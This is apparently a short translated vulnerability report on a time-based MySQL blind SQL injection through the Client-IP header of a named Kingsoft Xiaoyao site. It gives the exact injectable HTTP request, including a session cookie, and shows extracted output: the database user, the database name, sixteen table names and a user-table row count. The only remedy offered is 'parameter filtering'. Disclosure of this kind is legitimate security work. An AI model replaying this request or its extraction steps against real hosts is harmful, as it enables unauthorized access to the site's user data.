Kingsoft Xiaoyao another site Client-IP header MySQL blind Injection

Kingsoft Xiaoyao another site Client-IP header MySQL blind Injection

Kingsoft Xiaoyao another site Client-IP header MySQL blind Injection

Injection point:

GET /v1/admin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Client-IP: *X-Requested-With: XMLHttpRequestReferer: http://xd.team.xoyo.comCookie: PHPSESSID=48me9qdk3f10fna9vj5hp6pi73Host: xd.team.xoyo.comConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

The Client-IP header can be injected. MySQL time blind.

 

current user:    'mysql@LOCALHOST'current database:    'mafcation'Database: mafcation[16 tables]+--------------------+| languages          || m_ace              || m_area             || m_bulletin         || m_cron             || m_faction_award    || m_faction_role_log || m_factionset       || m_ip               || m_limiting         || m_mail             || m_name_filter      || m_operation_log    || m_transfer_captain || m_user             || m_visitor_count    |+--------------------+Database: mafcation+--------+---------+| Table  | Entries |+--------+---------+| m_user | 6       |+--------+---------+

Blind note, not continue to guess the user.

Solution:

Parameter Filtering